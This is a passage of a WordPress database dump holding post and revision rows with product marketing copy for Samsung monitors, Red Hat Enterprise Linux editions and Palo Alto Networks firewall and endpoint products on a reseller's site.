03:43:05','','32 Curved LED Monitor','','inherit','closed','closed','','32-curved-led-monitor','','','2018-12-19 11:43:05','2018-12-19 03:43:05','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-LED-Monitor.png',0,'attachment','image/png',0),(2536,1,'2018-12-19 11:43:32','2018-12-19 03:43:32','','32 Curved Monitor','','inherit','closed','closed','','32-curved-monitor','','','2018-12-19 11:43:32','2018-12-19 03:43:32','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-Monitor.png',0,'attachment','image/png',0),(2537,1,'2018-12-19 11:44:03','2018-12-19 03:44:03','','49 QLED Gaming Monitor CHG90','','inherit','closed','closed','','49-qled-gaming-monitor-chg90','','','2018-12-19 11:44:03','2018-12-19 03:44:03','',1580,'https://bintara.com.my/wp-content/uploads/2018/12/49-QLED-Gaming-Monitor-CHG90.png',0,'attachment','image/png',0),(2538,1,'2018-12-19 11:44:35','2018-12-19 03:44:35','','PA-3200','','inherit','closed','closed','','pa-3200','','','2018-12-19 11:44:35','2018-12-19 03:44:35','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-3200.jpg',0,'attachment','image/jpeg',0),(2539,1,'2018-12-19 11:48:48','2018-12-19 03:48:48','','PA-3000','','inherit','closed','closed','','pa-3000','','','2018-12-19 11:48:48','2018-12-19 03:48:48','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-3000.png',0,'attachment','image/png',0),(2540,1,'2018-12-19 11:50:43','2018-12-19 03:50:43','<h3>Samsung Monitor</h3>\r\n<h4>Immersive Experience</h4>\r\nDiscover the big, bold panoramic views that curved screens deliver.\r\n<h4>Excellence in Wok &amp; Play</h4>\r\nEnjoy a more Immersive Entertainment Experience through Samsungâ€™s Versatile High-Resolution Monitors\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2532 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-CJG5-Curved-Gaming-Monitor-300x289.png\" alt=\"\" width=\"300\" height=\"289\" />\r\n<h4>32\" CJG5 Curved Gaming Monitor with WQHD Resolution and 144Hz Refresh Rate</h4>\r\n<ul>\r\n 	<li>WQHD resolution (2560x1440)</li>\r\n 	<li>144hz refresh rate</li>\r\n 	<li>Immersive viewing experience with curved screen</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2533 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/24-Curved-Gaming-Monitor-CFG73-283x300.png\" alt=\"\" width=\"283\" height=\"300\" />\r\n<h4>24\" Curved Gaming Monitor CFG73 with Quantum Dot Display</h4>\r\n<ul>\r\n 	<li>Precise, firm positioning</li>\r\n 	<li>Curved to pull you in</li>\r\n 	<li>Smoother gameplay</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2534 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34-Curved-Widescreen-Monitor-300x206.png\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>34\" Curved Widescreen Monitor</h4>\r\n<ul>\r\n 	<li>Quantum dot technology supporting sRGB 125%</li>\r\n 	<li>1500 R Curvature 34â€ Widescreen Monitor</li>\r\n 	<li>3,000:1 contrast ratio</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2535 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-LED-Monitor-300x214.png\" alt=\"\" width=\"300\" height=\"214\" />\r\n<h4>32\" Curved LED Monitor with ultra slim design</h4>\r\n<ul>\r\n 	<li>1800 R curvature for an immersive viewing experience</li>\r\n 	<li>Glossy white ultra-slim and sleek design</li>\r\n 	<li>Vibrant Superior Picture Quality</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2536 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-Monitor-300x228.png\" alt=\"\" width=\"300\" height=\"228\" />\r\n<h4>32\" Curved Monitor with Quantum dot and WQHD resolution</h4>\r\n<ul>\r\n 	<li>Richer, more vivid colors with Quantum Dot technology</li>\r\n 	<li>Incredibly detailed, pin-sharp images with WQHD resolution</li>\r\n 	<li>Immersive viewing experience with Industry-leading 1800R curvature</li>\r\n 	<li>Enhanced gaming experience with AMD Freesync and Game mode</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2537 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/49-QLED-Gaming-Monitor-CHG90-300x158.png\" alt=\"\" width=\"300\" height=\"158\" />\r\n<h4>49\" QLED Gaming Monitor CHG90 with Super Ultra-Wide Screen</h4>\r\n<ul>\r\n 	<li>Quantum Dot (QLED)</li>\r\n 	<li>HDR</li>\r\n 	<li>144 Hz refresh rate / 1 ms Respond time</li>\r\n</ul>','Samsung','','inherit','closed','closed','','1580-revision-v1','','','2018-12-19 11:50:43','2018-12-19 03:50:43','',1580,'https://bintara.com.my/blog/2018/12/19/1580-revision-v1/',0,'revision','',0),(2541,1,'2018-12-19 11:53:22','2018-12-19 03:53:22','','PA-800','','inherit','closed','closed','','pa-800','','','2018-12-19 11:53:22','2018-12-19 03:53:22','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-800.jpg',0,'attachment','image/jpeg',0),(2542,1,'2018-12-19 11:55:04','2018-12-19 03:55:04','','PA500_FT','','inherit','closed','closed','','pa500_ft','','','2018-12-19 11:55:04','2018-12-19 03:55:04','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA500_FT.jpg',0,'attachment','image/jpeg',0),(2543,1,'2018-12-19 11:56:11','2018-12-19 03:56:11','<h3>Samsung Monitor</h3>\r\n<h4>Immersive Experience</h4>\r\nDiscover the big, bold panoramic views that curved screens deliver.\r\n<h4>Excellence in Wok &amp; Play</h4>\r\nEnjoy a more Immersive Entertainment Experience through Samsungâ€™s Versatile High-Resolution Monitors\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2532 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-CJG5-Curved-Gaming-Monitor-300x289.png\" alt=\"\" width=\"300\" height=\"289\" />\r\n<h4>32\" CJG5 Curved Gaming Monitor with WQHD Resolution and 144Hz Refresh Rate</h4>\r\n<ul>\r\n 	<li>WQHD resolution (2560x1440)</li>\r\n 	<li>144hz refresh rate</li>\r\n 	<li>Immersive viewing experience with curved screen</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2533 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/24-Curved-Gaming-Monitor-CFG73-283x300.png\" alt=\"\" width=\"283\" height=\"300\" />\r\n<h4>24\" Curved Gaming Monitor CFG73 with Quantum Dot Display</h4>\r\n<ul>\r\n 	<li>Precise, firm positioning</li>\r\n 	<li>Curved to pull you in</li>\r\n 	<li>Smoother gameplay</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2534 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34-Curved-Widescreen-Monitor-300x206.png\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>34\" Curved Widescreen Monitor</h4>\r\n<ul>\r\n 	<li>Quantum dot technology supporting sRGB 125%</li>\r\n 	<li>1500 R Curvature 34â€ Widescreen Monitor</li>\r\n 	<li>3,000:1 contrast ratio</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2535 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-LED-Monitor-300x214.png\" alt=\"\" width=\"300\" height=\"214\" />\r\n<h4>32\" Curved LED Monitor with ultra slim design</h4>\r\n<ul>\r\n 	<li>1800 R curvature for an immersive viewing experience</li>\r\n 	<li>Glossy white ultra-slim and sleek design</li>\r\n 	<li>Vibrant Superior Picture Quality</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2536 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-Monitor-300x228.png\" alt=\"\" width=\"300\" height=\"228\" />\r\n<h4>32\" Curved Monitor with Quantum dot and WQHD resolution</h4>\r\n<ul>\r\n 	<li>Richer, more vivid colors with Quantum Dot technology</li>\r\n 	<li>Incredibly detailed, pin-sharp images with WQHD resolution</li>\r\n 	<li>Immersive viewing experience with Industry-leading 1800R curvature</li>\r\n 	<li>Enhanced gaming experience with AMD Freesync and Game mode</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2537 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/49-QLED-Gaming-Monitor-CHG90-300x158.png\" alt=\"\" width=\"300\" height=\"158\" />\r\n<h4>49\" QLED Gaming Monitor CHG90 with Super Ultra-Wide Screen</h4>\r\n<ul>\r\n 	<li>Quantum Dot (QLED)</li>\r\n 	<li>HDR</li>\r\n 	<li>144 Hz refresh rate / 1 ms Respond time</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','Samsung','','inherit','closed','closed','','1580-revision-v1','','','2018-12-19 11:56:11','2018-12-19 03:56:11','',1580,'https://bintara.com.my/blog/2018/12/19/1580-revision-v1/',0,'revision','',0),(2544,1,'2018-12-19 11:58:28','2018-12-19 03:58:28','','PA-220R','','inherit','closed','closed','','pa-220r','','','2018-12-19 11:58:28','2018-12-19 03:58:28','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-220R.jpg',0,'attachment','image/jpeg',0),(2547,1,'2018-12-19 12:04:56','2018-12-19 04:04:56','','PA-220','','inherit','closed','closed','','pa-220','','','2018-12-19 12:04:56','2018-12-19 04:04:56','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-220.jpg',0,'attachment','image/jpeg',0),(2546,1,'2018-12-19 12:02:40','2018-12-19 04:02:40','','PA-200','','inherit','closed','closed','','pa-200','','','2018-12-19 12:02:40','2018-12-19 04:02:40','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-200.png',0,'attachment','image/png',0),(2548,1,'2018-12-19 12:55:06','2018-12-19 04:55:06','<h3><strong>SERVER VARIANTS &amp; OPTIONS</strong></h3>\r\n<h4>An OS for every occasion</h4>\r\nExtend your Linux infrastructure with customized versions of Red Hat Enterprise Linux, add-on functionality, desktop options, and developer tools.\r\n\r\nNew to Red Hat Enterprise Linux? Learn how it can help you modernize your IT infrastructure and free you from the costs and burdens of legacy systems.\r\n<h4>Red Hat Enterprise Linux Atomic Host</h4>\r\nRed Hat Enterprise Linux Atomic Host is a secure, minimal-footprint operating system optimized to run Linux containers. It couples the flexible, lightweight, and modular capabilities of Linux containers with the reliability and security of Red Hat Enterprise Linux in a reduced image size.\r\n\r\n<strong>With Red Hat Enterprise Linux Atomic Host, you can:</strong>\r\n<ul>\r\n 	<li>Deliver apps faster.</li>\r\n 	<li>Reduce support and maintenance efforts.</li>\r\n 	<li>Extend container portability across open hybrid cloud infrastructure.</li>\r\n 	<li>Inherit the stability and maturity of Red Hat Enterprise Linux.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux Server for High-Performance Computing (HPC)</h4>\r\nRed Hat Enterprise Linux Server for HPC is a robust platform that helps scientific users tackle challenging workloads by deploying clusters of systems. Red Hat Enterprise Linux clusters are affordable, easy to deploy, and support hardware scale-out.\r\n\r\n<strong>With Red Hat Enterprise Linux Server for HPC, you can:</strong>\r\n<ul>\r\n 	<li>Streamline deployment with a lightweight clustering option.</li>\r\n 	<li>Customize the platform for your environment.</li>\r\n 	<li>Minimize points of failure and security vulnerabilities.</li>\r\n 	<li>Simplify management tasks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Power</h4>\r\nRed Hat Enterprise Linux for PowerÂ® includes additional components and versions of user packages for IBMÂ® Power Systems hardware and firmware. Deploy apps with confidence using the advanced features in IBM Power Systems and the consistency and flexibility of the market-leading Red Hat Enterprise Linux operating platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Power, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Support the latest IBM Power Systems features, including both big and little endian modes.</li>\r\n 	<li>Enable efficient operations and increase IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for IBM z Systems</h4>\r\nBuilt on a decade-plus of industry collaboration, Red Hat Enterprise Linux for IBM z Systems brings Linux apps to the mainframe, and delivers efficient management for your Linux workloads. Combine the core strengths of the IBM mainframe and IBM software with the open flexibility of Linux to reduce complexity and cost for todayâ€™s applications.\r\n\r\n<strong>With Red Hat Enterprise Linux for IBM z Systems, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization the hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Run Linux-certified apps on IBM z Systems.</li>\r\n 	<li>Increase efficiency of operations and IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Real Time</h4>\r\nRed Hat Enterprise Linux for Real Time is a computing platform for deadline-orientated apps and time-sensitive workloads. Using a specialized version of the Red Hat Enterprise Linux 7 kernel that has been tuned to deliver consistent low-latency response times, Red Hat Enterprise Linux for Real Time retains the reliability, scalability, and performance of the worldâ€™s leading enterprise Linux platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Real Time, you can:</strong>\r\n\r\nMinimize the potential for deviations in application performance with scheduling and performance gains.\r\nInherit the stability and maturity of Red Hat Enterprise Linux.\r\nEnjoy full application compatibility with standard Red Hat Enterprise Linux.\r\n\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Applications</h4>\r\nRed Hat Enterprise Linux for SAPÂ® Applications lets you reduce the complexity of your SAP application and database deployments. It includes the infrastructure software stack you need for optimal operation of SAP applications, plus enterprise-class service and support. As a Red Hat customer, you can get a ready-to-use, fully supported SAP environment in one package for new installations of or migrations to Red Hat Enterprise Linux.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Applications, you can:</strong>\r\n<ul>\r\n 	<li>Deploy a platform optimized for SAP workloads.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n 	<li>Be confident that SAP products are optimized and certified on Red Hat Enterprise Linux through collaborative engineering.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Solutions</h4>\r\nRed Hat Enterprise Linux for SAP Solutions provides an open, reliable, and scalable foundation for your most demanding data solutions. This ready-to-use environment is preconfigured for performance and optimized for SAP Solutions.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Solutions, you can:</strong>\r\n<ul>\r\n 	<li>Simplify your SAP landscape by standardizing on 1 operating system.</li>\r\n 	<li>Deploy in on-premise or off-premise cloud environments.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Redhat','','inherit','closed','closed','','1577-autosave-v1','','','2018-12-19 12:55:06','2018-12-19 04:55:06','',1577,'https://bintara.com.my/blog/2018/12/19/1577-autosave-v1/',0,'revision','',0),(2549,1,'2018-12-19 12:45:19','2018-12-19 04:45:19','<h2>NEXT-GENERATION FIREWALL</h2>\r\nOur next-generation firewalls secure your business with a prevention-focused architecture and integrated innovations that are easy to deploy and use. Now, you can accelerate growth and eliminate risks at the same time.\r\n\r\nOur next-generation firewalls are available as physical appliances, virtualized appliances and cloud-delivered service, all managed consistently with Panorama.\r\n<ul>\r\n 	<li><strong>Harness shared intelligence to prevent successful attacks</strong></li>\r\n</ul>\r\nPalo Alto NetworksÂ® next-generation firewalls detect known and unknown threats, including in encrypted traffic, using intelligence generated across many thousands of customer deployments. That means they reduce risks and prevent a broad range of attacks.\r\n<ul>\r\n 	<li><strong>Automate to save time and focus on what matters most</strong></li>\r\n</ul>\r\nWith our next-generation firewalls, you can quickly create security rules that mirror business policy, are easy to maintain and adapt to your dynamic environment. They reduce response times with automated policy-based actions, and you can automate workflows via integration with administrative tools, such as ticketing services, or any system with a RESTful API.\r\n<ul>\r\n 	<li><strong>Leverage innovations that help you adapt</strong></li>\r\n</ul>\r\nOur next-generation firewalls give you access to the latest innovations of Palo Alto Networks Security Operating Platform.\r\n<h3>Products :</h3>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"120\"><img class=\"wp-image-2529 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-7000.jpg\" alt=\"\" width=\"131\" height=\"115\" />\r\n<p style=\"text-align: center;\"><strong>PA-7000 Series</strong></p>\r\nPerfect blend of power, intelligence, simplicity and versatility for enterprise and service provider deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2528\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5250.jpg\" alt=\"\" width=\"440\" height=\"196\" />\r\n<p style=\"text-align: center;\"><strong>PA-5200 Series</strong></p>\r\nNo-compromise security and high-performance versatility for data centers and service providers</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"wp-image-2531 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5000.jpg\" alt=\"\" width=\"167\" height=\"58\" />\r\n<p style=\"text-align: center;\"><strong>PA-5000 Series</strong></p>\r\nHigh-performance with one consistent architecture for data center deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2538\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3200.jpg\" alt=\"\" width=\"374\" height=\"135\" />\r\n<p style=\"text-align: center;\"><strong>PA-3200 Series</strong></p>\r\nPredictable performance and broad threat coverage for the internet edge</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2539\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3000.png\" alt=\"\" width=\"616\" height=\"195\" />\r\n<p style=\"text-align: center;\"><strong>PA-3000 Series</strong></p>\r\nMulti-gigabit throughput to prevent attacks on the internet edge</td>\r\n</tr>\r\n<tr>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2541\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-800.jpg\" alt=\"\" width=\"440\" height=\"150\" />\r\n<p style=\"text-align: center;\"><strong>PA-800 Series</strong></p>\r\nRock-solid security for the branch and midsize business</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2542\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA500_FT.jpg\" alt=\"\" width=\"700\" height=\"123\" />\r\n<p style=\"text-align: center;\"><strong>PA-500</strong></p>\r\nConsistent architecture for a broad range of small-business applications</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2544\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220R.jpg\" alt=\"\" width=\"1600\" height=\"523\" />\r\n<p style=\"text-align: center;\"><strong>PA-220R</strong></p>\r\nRuggedized form factor for industrial applications</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2547\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220.jpg\" alt=\"\" width=\"640\" height=\"238\" />\r\n<p style=\"text-align: center;\"><strong>PA-220</strong></p>\r\nSmall form factor with the power to prevent network threats</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2546\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-200.png\" alt=\"\" width=\"960\" height=\"420\" />\r\n<p style=\"text-align: center;\"><strong>PA-200</strong></p>\r\nNext-generation firewall in a small footprint</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>CLOUD SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h3>Redlock</h3>\r\n</li>\r\n</ol>\r\nRedLock is a critical element of the Palo Alto Networks Security Operating Platform, enabling you to benefit from the industryâ€™s most complete offering for public cloud security. Our other cloud products allow you to:\r\n<ul>\r\n 	<li>Protect and segment cloud workloads</li>\r\n 	<li>Adopt advanced host-based protection</li>\r\n</ul>\r\n<h3>2.Â Aperture</h3>\r\nSecure the business-critical data within your SaaS applications.\r\n<ul>\r\n 	<li><strong>Risk discovery and deep visibility</strong></li>\r\n</ul>\r\nAperture provides complete visibility across all user and data activity, along with detailed analysis that helps you transition from speculation to certainty about whatâ€™s happening at any given point in time.\r\n<ul>\r\n 	<li><strong>Data leak prevention and compliance</strong></li>\r\n</ul>\r\nData within enterprise-enabled cloud applications may not be visible to an organizationâ€™s network perimeter. Aperture can connect directly to enterprise SaaS applications to provide:\r\n\r\n-Data classification and monitoring\r\n-Data Loss Prevention (DLP) capabilities\r\n-User activity tracking for anomalies\r\n-Known and unknown malware prevention\r\n-Detailed risk and usage reporting\r\n<ul>\r\n 	<li><strong>Advanced threat prevention</strong></li>\r\n</ul>\r\nYou can keep threats from spreading through the sanctioned SaaS applications, preventing a new insertion point for malware. New malware discovered by Aperture is shared with the rest of the Security Operating Platform, strengthening your overall security posture.\r\n<h3>3. VM-Series</h3>\r\nThe VM-Series offers a unique combination of visibility, control over your applications and data, and protection against both known and unknown threats. The result is an unprecedented level of security for critical deployments in private and public clouds. Specifically, the VM-Series gives you the ability to:\r\n<ul>\r\n 	<li>Protect mission-critical applications and data</li>\r\n 	<li>Block lateral movement of cyberthreats</li>\r\n 	<li>Automate security so it keeps pace with your business</li>\r\n</ul>\r\n<h2>ENDPOINT PROTECTION</h2>\r\n<h3>TRAPS</h3>\r\nProtect endpoints from malware, exploits and ransomware. Trapsâ„¢ advanced endpoint protection stops threats on the endpoint and coordinates enforcement with cloud and network security to prevent successful cyberattacks.\r\n<ul>\r\n 	<li><strong>Simple cloud-based management</strong></li>\r\n</ul>\r\nWith the Traps management service, a cloud-based endpoint security service, you save the time and cost of having to build out your own global security infrastructure. Deployment is simple and fast, requiring no server licenses, databases or other infrastructure to get started.\r\n<ul>\r\n 	<li><strong>Intuitive user experience</strong></li>\r\n</ul>\r\nTraps provides an intuitive interface that makes it easy to manage policies and events, and accelerate incident response â€“ helping to minimize the operational challenges associated with protecting your endpoints. From the Traps management service web console, you can manage the endpoint security policy, review security events as they occur, and perform additional analysis of associated logs.\r\n<ul>\r\n 	<li><strong>Lightweight, non-disruptive agent</strong></li>\r\n</ul>\r\nThe Traps agent enforces your security policy on the endpoint and reports when it detects a threat. The Traps endpoint agent consists of various drivers and services yet requires minimal memory and CPU usage to ensure a non-disruptive user experience. Following its deployment, system administrators have complete control over all Traps agents in the environment through the Traps management service.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','PaloAlto','','inherit','closed','closed','','1569-revision-v1','','','2018-12-19 12:45:19','2018-12-19 04:45:19','',1569,'https://bintara.com.my/blog/2018/12/19/1569-revision-v1/',0,'revision','',0),(2550,1,'2018-12-19 12:53:35','2018-12-19 04:53:35','<h3><strong>SERVER VARIANTS &amp; OPTIONS</strong></h3>\r\n<h4>An OS for every occasion</h4>\r\nExtend your Linux infrastructure with customized versions of Red Hat Enterprise Linux, add-on functionality, desktop options, and developer tools.\r\n\r\nNew to Red Hat Enterprise Linux? Learn how it can help you modernize your IT infrastructureâ€”and free you from the costs and burdens of legacy systems.\r\n<h4>Red Hat Enterprise Linux Atomic Host</h4>\r\nRed Hat Enterprise Linux Atomic Host is a secure, minimal-footprint operating system optimized to run Linux containers. It couples the flexible, lightweight, and modular capabilities of Linux containers with the reliability and security of Red Hat Enterprise Linux in a reduced image size.\r\n\r\n<strong>With Red Hat Enterprise Linux Atomic Host, you can:</strong>\r\n<ul>\r\n 	<li>Deliver apps faster.</li>\r\n 	<li>Reduce support and maintenance efforts.</li>\r\n 	<li>Extend container portability across open hybrid cloud infrastructure.</li>\r\n 	<li>Inherit the stability and maturity of Red Hat Enterprise Linux.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux Server for High-Performance Computing (HPC)</h4>\r\nRed Hat Enterprise Linux Server for HPC is a robust platform that helps scientific users tackle challenging workloads by deploying clusters of systems. Red Hat Enterprise Linux clusters are affordable, easy to deploy, and support hardware scale-out.\r\n\r\n<strong>With Red Hat Enterprise Linux Server for HPC, you can:</strong>\r\n<ul>\r\n 	<li>Streamline deployment with a lightweight clustering option.</li>\r\n 	<li>Customize the platform for your environment.</li>\r\n 	<li>Minimize points of failure and security vulnerabilities.</li>\r\n 	<li>Simplify management tasks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Power</h4>\r\nRed Hat Enterprise Linux for PowerÂ® includes additional components and versions of user packages for IBMÂ® Power Systems hardware and firmware. Deploy apps with confidence using the advanced features in IBM Power Systems and the consistency and flexibility of the market-leading Red Hat Enterprise Linux operating platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Power, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Support the latest IBM Power Systems features, including both big and little endian modes.</li>\r\n 	<li>Enable efficient operations and increase IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for IBM z Systems</h4>\r\nBuilt on a decade-plus of industry collaboration, Red Hat Enterprise Linux for IBM z Systems brings Linux apps to the mainframe, and delivers efficient management for your Linux workloads. Combine the core strengths of the IBM mainframe and IBM software with the open flexibility of Linux to reduce complexity and cost for todayâ€™s applications.\r\n\r\n<strong>With Red Hat Enterprise Linux for IBM z Systems, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization the hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Run Linux-certified apps on IBM z Systems.</li>\r\n 	<li>Increase efficiency of operations and IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Real Time</h4>\r\nRed Hat Enterprise Linux for Real Time is a computing platform for deadline-orientated apps and time-sensitive workloads. Using a specialized version of the Red Hat Enterprise Linux 7 kernel that has been tuned to deliver consistent low-latency response times, Red Hat Enterprise Linux for Real Time retains the reliability, scalability, and performance of the worldâ€™s leading enterprise Linux platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Real Time, you can:</strong>\r\n\r\nMinimize the potential for deviations in application performance with scheduling and performance gains.\r\nInherit the stability and maturity of Red Hat Enterprise Linux.\r\nEnjoy full application compatibility with standard Red Hat Enterprise Linux.\r\n\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Applications</h4>\r\nRed Hat Enterprise Linux for SAPÂ® Applications lets you reduce the complexity of your SAP application and database deployments. It includes the infrastructure software stack you need for optimal operation of SAP applications, plus enterprise-class service and support. As a Red Hat customer, you can get a ready-to-use, fully supported SAP environment in one package for new installations of or migrations to Red Hat Enterprise Linux.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Applications, you can:</strong>\r\n<ul>\r\n 	<li>Deploy a platform optimized for SAP workloads.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n 	<li>Be confident that SAP products are optimized and certified on Red Hat Enterprise Linux through collaborative engineering.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Solutions</h4>\r\nRed Hat Enterprise Linux for SAP Solutions provides an open, reliable, and scalable foundation for your most demanding data solutions. This ready-to-use environment is preconfigured for performance and optimized for SAP Solutions.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Solutions, you can:</strong>\r\n<ul>\r\n 	<li>Simplify your SAP landscape by standardizing on 1 operating system.</li>\r\n 	<li>Deploy in on-premise or off-premise cloud environments.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Redhat','','inherit','closed','closed','','1577-revision-v1','','','2018-12-19 12:53:35','2018-12-19 04:53:35','',1577,'https://bintara.com.my/blog/2018/12/19/1577-revision-v1/',0,'revision','',0),(2551,1,'2018-12-19 12:54:57','2018-12-19 04:54:57','<h3><strong>SERVER VARIANTS &amp; OPTIONS</strong></h3>\r\n<h4>An OS for every occasion</h4>\r\nExtend your Linux infrastructure with customized versions of Red Hat Enterprise Linux, add-on functionality, desktop options, and developer tools.\r\n\r\nNew to Red Hat Enterprise Linux? Learn how it can help you modernize your IT infrastructure and free you from the costs and burdens of legacy systems.\r\n<h4>Red Hat Enterprise Linux Atomic Host</h4>\r\nRed Hat Enterprise Linux Atomic Host is a secure, minimal-footprint operating system optimized to run Linux containers. It couples the flexible, lightweight, and modular capabilities of Linux containers with the reliability and security of Red Hat Enterprise Linux in a reduced image size.\r\n\r\n<strong>With Red Hat Enterprise Linux Atomic Host, you can:</strong>\r\n<ul>\r\n 	<li>Deliver apps faster.</li>\r\n 	<li>Reduce support and maintenance efforts.</li>\r\n 	<li>Extend container portability across open hybrid cloud infrastructure.</li>\r\n 	<li>Inherit the stability and maturity of Red Hat Enterprise Linux.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux Server for High-Performance Computing (HPC)</h4>\r\nRed Hat Enterprise Linux Server for HPC is a robust platform that helps scientific users tackle challenging workloads by deploying clusters of systems. Red Hat Enterprise Linux clusters are affordable, easy to deploy, and support hardware scale-out.\r\n\r\n<strong>With Red Hat 